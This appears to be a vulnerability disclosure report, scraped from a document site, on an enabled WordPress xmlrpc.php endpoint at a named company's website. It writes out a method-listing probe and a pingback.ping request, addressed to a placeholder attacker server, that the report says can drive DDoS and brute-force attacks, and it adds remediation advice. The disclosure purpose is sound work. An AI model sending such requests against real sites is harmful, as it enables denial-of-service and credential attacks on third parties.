Professional Documents
Culture Documents
Hi Team,
URL: https://www.virtru.com/xmlrpc.php
In order to determine whether the xmlrpc.php file is enabled or not, using the
Repeater tab in Burp, send the request below.
Request:
Host: www.virtru.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/
*;q=0.8
Accept-Language: en-US,en;q=0.5
DNT: 1
Connection: close
Cookie: wordpress_test_cookie=WP+Cookie+check
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 91
1/8
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>
Response:
HTTP/1.1 200 OK
Content-Length: 4581
Connection: close
Vary: X-Forwarded-Proto,Accept,Accept-Encoding,User-Agent
X-Powered-By: WP Engine
Access-Control-Allow-Origin: *
CF-Cache-Status: DYNAMIC
2/8
cf-request-id: 0afe78fefe00000dd07921d000000001
Server: cloudflare
CF-RAY: 66775dde69540dd0-BOM
Notice that a successful response is received showing that the xmlrpc.php file is
enabled.Now, considering the domain
https://www.virtru.com, the xmlrpc.php file discussed above could potentially be
abused to cause a DDOS attack against a victim host. This is achieved by simply
sending a request that looks like below.
5/8
POST /xmlrpc.php HTTP/1.1
Host: www.virtru.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/
*;q=0.8
Accept-Language: en-US,en;q=0.5
DNT: 1
Connection: close
Cookie: wordpress_test_cookie=WP+Cookie+check
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 91
<methodCall>
<methodName>pingback.ping</methodName>
<params>
code
<param>
<value><string>http://<YOUR SERVER ></string></value>
</param>
<param>
<value><string>https://www.virtru.com//string></value>
</param>
</params>
</methodCall>
Remediation:
If the XMLRPC.php file is not being used, it should be disabled and removed
completely to avoid any potential risks. Otherwise, it
should at the very least be blocked from external access.
Reference :
1) Here is the explanation of xmlrpc file enable brute force attack- https://
6/8
blog.sucuri.net/2015/10/brute-force-amplification-attacks-against-wordpress-
xmlrpc.html
2) The explanation for xmlrpc.php file will enable dos attack- https://blog.sucuri.net/
2014/03/more-than-162000-wordpress-sites-used-for-distributed-denial-of-service-
attack.html
Impact
1)This can be automated from multiple hosts and be used to cause a mass DDOS
attack on the victim.
2) This method is also used for brute force attacks to stealing the admin credentials
and other important credentials
POC images
virtru.com/xmlrpc.php
7/8
8/8